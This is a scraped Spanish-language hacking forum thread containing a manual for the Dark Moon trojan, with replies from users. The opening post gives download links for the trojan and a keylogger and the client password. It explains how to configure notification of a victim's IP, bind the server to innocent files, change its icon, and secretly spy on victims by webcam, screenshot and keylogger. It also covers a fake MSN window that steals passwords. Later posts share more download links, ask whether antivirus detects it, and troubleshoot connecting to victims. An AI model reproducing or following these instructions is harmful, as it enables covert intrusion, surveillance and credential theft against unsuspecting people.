Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 05:16:14
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Manual Dark Moon 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Manual Dark Moon  (Leído 5209 veces)
vassily
Visitante
« en: Mayo 16, 2005, 07:52:34 »

-------------------------
Manual hecho por lombry
-------------------------

Bueno me he puesto a hacer un manual del Dark Moon, ya que parese que les interesa este troyano, aqui les dejo las descargas y el manual:
http://www.polarhome.com:793/~webftp/webftp/imagenes/darkmoon.zip Descarga Del DarkMoon

Nota: Este es un keylogger que tiene las funciones de acer un log de lo que el usurio escribe y paginas que entra y captura la pantalla cada minuto y la guarda en formato jpg, y por si fuera poco tiene una opcion espia como un truco para el msn messenger para robar el password , ya que sale una ventana exactamente igual ala version 6 del msn messenger y lo guarda el password y el email en el log y para activarlo escribe 'showkey' y para esconderlo escri 'hidekey'
Fuente de esta Nota: http://darkmoon.webcindario.com
http://darkmoon.webcindario.com/keys.exe Descarga Del Keylogger
http://darkmoon.webcindario.com/darkmooonremover.exe Descarga Para Desinfectarse Del Dark Moon

El plugin para ver la webcam en el Dark Moon, no sirve la descarga y yo no tengo el plugin, si alguien lo tiene que ponga la descarga.
Bueno abrimos el DM Client y nos aparece, la ventana como está en la imagen, en donde dice "Password ahí tenemos que poner la contraseña del troyano y la contraseña es:":
fucktheworld
Luego que ponemos la contraseña le hacemos click en el botón "Accept" y ya podemos usar el troyano, ahora explico como crear el server y para que sirve cada opción del Dark Moon.[/b]

Después se van a la pestaña "Setup" ahí vamos a crear nuestro server.
Luego nos aparecen tres tipos de notificaciones para que nos envíe la ip de la víctima: FTP, E-MAIL, IP.
Si queremos, que nos notifique por E-MAIL, tenemos que poner lo siguiente:
En "Your SMTP Name" ahí tenemos que poner, el SMTP de nuestro correo, si queremos poner para que nos notifique, a una cuenta de hotmail, ponemos mx4.hotmail.com este es el SMTP que menos se colapsa y es mas seguro para la notificación.
En "Your E-mail Adress" ahí tenemos que poner nuestro email, es ahí donde nos va a llegar la notificación con la ip de la víctima.

Si queremos, que nos notifique por FTP, tenemos que poner los datos de nuestro FTP que tengamos y después la ip de nuestra víctima, se subirá a nuestro FTP, como un archivo de texto.

La notificación por IP:
En "Your IP Adress" ahí tenemos que poner nuestra ip para que nos notifique a través de ella.
Nota Importante: Si quieren usar, la notificación por IP, asegurensen de que ustedes tengan, una IP fija.

También en el Troyano, tenemos incluido un Binder, esta opción sirve para juntar el server del troyano, a otro archivo.
Hagan click en el botón "Add File" para seleccionar el archivo, con el que quieran juntar, el server del troyano.

En la opción "Icon" nos sirve para poder cambiarle el icono del server.
Para seleccionar un icono para nuestro server, hagan click, en el boton "Add Icon".
Ahora hacen click, en el botón "Open" y seleccionamos el server, que ya viene incluido, en el Dark Moon.
Después hacen click, en el botón "Save" para guardar el server, que hemos configurado.

Después que ya hayamos enviado el troyano a nuestra víctima y ya nos haya llegado la notificación con la ip de la víctima, hacemos click en la pestaña "Main".
Ahí señale, con una flecha, donde, deben poner la IP de su víctima.
Luego que hayan puesto la ip de su víctima aprietan en el botón "Connect to:" para que se conecten con la pc de su víctima.
Después si se han conectado con la pc de la víctima, pueden empezar haciendo sus travesuras, en el MENÚ, tienen muchas opciones como abrir la bandeja de la lectora de CD, cambiar la resolución del monitor, cambiar el nombre de la computadora, podes cambiar el papel tapiz, podes ver la información de la pc, etc.

La pestaña "Chat" es para que nosotros podamos, chatear con nuestra víctima anonimamente.

La pestaña "Spy" ahí podemos ver a la víctima, por "WebCam" sin que ella se de cuenta, tambien podemos tomar "Screenshot", para los que no saben que es "Screenshot", es tomar fotos de la pantalla de la víctima y también tiene "Keys" este es un keylogger, para espiar las teclas pulsadas en el teclado por la víctima, para activar estas opciones, tenemos que hacer click en el botón "Enable".

En la pestaña "Explorer" ahí podemos descargar, enviar, borrar, renombrar y ejecutar archivos de la pc de la víctima.

La pestaña "Tools" es para que ustedes se puedan conectar con su FTP.

:arrow: By El H  @cker Neo para http://www.hackerss.com y http://www.troyanoss.tk
Este manual es de libre distribución pero siempre y cuando respetando el nombre del autor y no modificando nada del manual.

« Última modificación: Marzo 20, 2008, 11:15:50 por Angelus_7722 » En línea
KSN.
Visitante
« Respuesta #1 en: Mayo 16, 2005, 09:33:53 »

esta buano el manual yo mismo hice uno sobre el optix pro y modificarle el registro del server con el hex dump

http://foro.el-hacker.com/index.php/topic,25153.0.html

lo que yo propongo tambien lo pueden hacer con este toyano
 Cheesy
ErJoselillo
Visitante
« Respuesta #2 en: Mayo 17, 2005, 04:53:13 »

El link del Darkmoon esta roto.
Podrias decir q version del Darkmoon es??. La special edition no es verdad???, porque me lo baje y la interfaz no es igual.
Chaito
LooSeR[FT]
Visitante
« Respuesta #3 en: Mayo 17, 2005, 09:43:11 »

Pues el del manual debe ser el mas viejo, porque es la v1, eso pone en el programa, y la especial edition seguramente tengas la 4.0, asi que esta un poco anticuado, aunque esto de los troyanos... casi siempre visto uno vistos todos, porque quizas tenga alguna opcion nueva, pero no plantean complicaciones Wink
febleu
Visitante
« Respuesta #4 en: Mayo 17, 2005, 04:04:47 »

Vassily, muy bueno el tuto y asi sea del viejito como dice looser, sirve pues es cierto q casi todos son muy parecidos en su utilizacion.

Bueno otra cosita para todos: alguien sabe si la v4.0 es detectada?

Suerte!
LooSeR[FT]
Visitante
« Respuesta #5 en: Mayo 17, 2005, 05:20:04 »

Pues la 4.0 Especial Edition antes solo era detectada por Nod32 creo que dijeron, ahora nolose, pero mi antivirus no la detecta todavia, el Panda Internet Security Wink
falillo
Visitante
« Respuesta #6 en: Julio 13, 2005, 12:31:10 »

al conetarme con el pc de mi vitima pone connection refused eso porke es??alguna cosa para poder conetarme sera del puerto? Cool
falillo
Visitante
« Respuesta #7 en: Julio 16, 2005, 07:15:30 »

anda ke contestais ¬¬
« Última modificación: Marzo 20, 2008, 11:17:08 por Angelus_7722 » En línea
zoro
Recien Llegado
*
Desconectado Desconectado

Ver Perfil
« Respuesta #8 en: Agosto 27, 2006, 04:59:27 »

hola soy nuevo en este foro  y recien enpieso  a aprender  sobre cosas del  tema y  me recomendaron q me vajara el darkmoon  pero no encuentro el manual o alguna forma de instruirme  mas sobre darkmoon por  favor si alguien me podria ayudar se los  agradeseria  mucho.
una amistad vale  mas  q todo Wink
damiguero
Habitual

damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #9 en: Agosto 28, 2006, 11:59:31 »

aqui creo que vi el darkmoon:

www.trojanfrance.com

the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #10 en: Octubre 26, 2006, 10:54:50 »

Hola Man.. Todo bien ?..--.. bueno te queria pedir un favor. soy nuevo en esto.. y bueno descargu el programa .. por una causa justa.. y bueno te queria pedir si no te molesta pasarme la clave.. para iniciar el programa.. !! .. espero q no sea mucha molesta.. Saludos .. no vemo.. desde ya muchas gracias... Email Borrado
« Última modificación: Febrero 21, 2007, 11:18:03 por DarknessFeatSunny » En línea
damiguero
Habitual

damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #11 en: Octubre 26, 2006, 05:16:08 »

cual clave?
el darkmoon no esta protegido con clave...
 Huh Huh Huh

salu2

the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #12 en: Octubre 27, 2006, 07:25:00 »

Me pide un password... ... no puedo ejecutarlo... ...
damiguero
Habitual

damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #13 en: Octubre 27, 2006, 09:30:00 »

debe ser la nueva version pq la version porque esta no pide nada...
http://www.trojanfrance.com/index.php?dir=Trojans/&file=DarkMoon%20v4.11.zip

salu2

pd.- el que tenga la nueva y ultima version que la pase ps...

the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #14 en: Octubre 27, 2006, 09:34:23 »

anda bien la version de darkmoon q vos tenes.. pasamelo. por q la verdad estoy necesitando y de mucho es eprograma.. . gracias desde ya.. saludos..
the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #15 en: Octubre 27, 2006, 09:46:10 »

Gracias. Man... la descargo.. Saludos.. y exitos!!
the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #16 en: Octubre 30, 2006, 11:43:19 »

Hola... Bueno definitivamente no puedo utilizar el programa... necesito el password para descomprimirlo. y no lo tengo .. necesito ayuda ya q es por una causa justa... desde ya gracias.. espero respuesta...saludos nos vemos..
the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #17 en: Octubre 31, 2006, 11:17:10 »

Bueno.. hace dias q no puedo descomprimir el programa .. necesitaria la contraseña no creo q sea de mucha molesta pedirtela.. desde ya muchas gracias.. saludos
« Última modificación: Marzo 20, 2008, 11:24:05 por Angelus_7722 » En línea
damiguero
Habitual

damiguero@hotmail.com
Ver Perfil WWW Email
« Respuesta #18 en: Octubre 31, 2006, 12:31:44 »

cuando yo lo descargo de aqui: http://www.trojanfrance.com/index.php?dir=Trojans/&file=DarkMoon%20v4.11.zip
 no me pide contraseña...

salu2
« Última modificación: Marzo 20, 2008, 11:24:41 por Angelus_7722 » En línea

the_bot32
Recien Llegado
*

Ver Perfil
« Respuesta #19 en: Noviembre 01, 2006, 08:13:32 »

los descargue tambien de esa pagina.. pero analizarlo (acan with AVG free).. me sale ... Virus Statistics: Infected    1

nose si es normal eso. pero bue.. despues de ahi no me animo a seguir... ..Gracias de todas formas... Saludos
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderadores: -Erick-, Angelus_7722)  |  Tema: Manual Dark Moon « anterior próximo »
Ir a:  

Ranking-Hits